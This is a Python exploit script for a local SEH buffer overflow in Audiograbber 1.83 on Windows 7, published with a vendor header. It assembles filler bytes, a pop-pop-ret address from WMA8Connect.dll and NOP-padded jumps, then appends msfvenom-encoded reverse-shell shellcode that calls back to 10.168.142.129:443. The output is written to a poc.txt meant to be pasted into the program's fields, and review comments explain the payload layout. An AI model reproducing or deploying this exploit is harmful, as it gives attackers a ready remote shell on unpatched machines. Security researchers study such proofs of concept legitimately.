# Date: 2018-06-16
# Exploit Author: Dennis 'dhn' Herrmann
# Vendor Homepage: https://www.audiograbber.org/
# Version: 1.83
# Tested on: Windows 7 SP1 (x86)
#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
#
# Tested with Windows 7 SP1 (x86)
# Steps:
# - Paste "poc.txt" content in the "Interpret" or "Album" field
class Exploit:
    """Assemble the proof-of-concept string and write it to ``poc.txt``.

    The string is built once by :meth:`run` from a 256-byte filler, two
    fixed 4-byte values and a NOP-padded jump chain, followed by the
    shellcode handed to the constructor. The class only produces the
    file; nothing is sent or executed here.
    """

    def __init__(self, shellcode):
        # Raw shellcode string supplied by the caller; appended unchanged
        # at the very end of the payload in run().
        self._shellcode = shellcode
        # Filled in by run(); stays None until then, so calling __write()
        # before run() would fail inside f.write().
        self._payload = None

    def __write(self):
        # Name-mangled to _Exploit__write; only run() calls it.
        # Writes the payload as text to poc.txt in the current working
        # directory. The handle is not managed by a `with` block, so an
        # exception raised by write() would leave it open.
        # NOTE(review): the payload is a str written in text mode; that
        # only yields the intended raw bytes under Python 2 semantics.
        f = open("poc.txt", "w")
        f.write(self._payload)
        f.close()

    def run(self):
        """Build the payload in a fixed order and write it out.

        Layout (concatenation order is significant):
          256 x "A"             filler
          jmp_short (4 bytes)   "short JMP" per the original comment
          pop2ret   (4 bytes)   fixed address attributed to WMA8Connect.dll
          18 NOPs + jmp_short
          28 NOPs + jmp_short
          32 NOPs + shellcode

        NOTE(review): the page title calls this an SEH overflow, so the
        two 4-byte values presumably land on the exception-handler
        record; that cannot be confirmed from this file alone. A
        hard-coded handler address like pop2ret depends on that module
        loading at a fixed base without SafeSEH, which is exactly what
        SafeSEH/SEHOP and per-module ASLR are meant to break.
        """
        pattern = "A" * 256
        jmp_short = "\xeb\x08\x90\x90"  # short JMP
        pop2ret = "\x79\x91\x01\x10"  # WMA8Connect.dll
        self._payload = pattern
        self._payload += jmp_short
        self._payload += pop2ret
        # The buffer is mangled so we have to jump
        # over the parts to reach our shellcode
        self._payload += "\x90" * 18 + jmp_short
        self._payload += "\x90" * 28 + jmp_short
        self._payload += "\x90" * 32 + self._shellcode
        self.__write()
def main():
    """Build ``poc.txt`` from the embedded payload.

    The shellcode below is the author's msfvenom output (the command is
    reproduced in the comment that follows): a windows/shell_reverse_tcp
    payload pointed at the author's lab address 10.168.142.129:443,
    x86/alpha_mixed-encoded with the NUL, LF and CR bytes excluded.
    Those values are part of the author's test setup, not parameters of
    this script; the blob is passed to Exploit unchanged.
    """
    # msfvenom --platform windows -p windows/shell_reverse_tcp \
    # LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" \
    # -e x86/alpha_mixed -f py
    shellcode = (
        "\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51"
        "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
        "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
        "\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77"
        "\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61"
        "\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50"
        "\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32"
        "\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b"
        "\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c"
        "\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b"
        "\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50"
        "\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32"
        "\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b"
        "\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47"
        "\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b"
        "\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78"
        "\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75"
        "\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71"
        "\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34"
        "\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e"
        "\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74"
        "\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45"
        "\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61"
        "\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64"
        "\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42"
        "\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33"
        "\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47"
        "\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47"
        "\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79"
        "\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56"
        "\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70"
        "\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a"
        "\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48"
        "\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f"
        "\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37"
        "\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68"
        "\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e"
        "\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c"
        "\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d"
        "\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46"
        "\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76"
        "\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37"
        "\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30"
        "\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51"
        "\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36"
        "\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f"
        "\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36"
        "\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67"
        "\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65"
        "\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d"
        "\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a"
        "\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77"
        "\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43"
        "\x6b\x4f\x69\x45\x41\x41"
    )
    # Exploit.run() assembles the full string and writes poc.txt into the
    # current working directory; the shellcode is appended last.
    exploit = Exploit(shellcode)
    exploit.run()
if __name__ == "__main__":
    # Script entry point: running the file writes poc.txt into the
    # current working directory and does nothing else.
    main()
Audiograbber 1.83 - Local Buffer Overflow (SEH)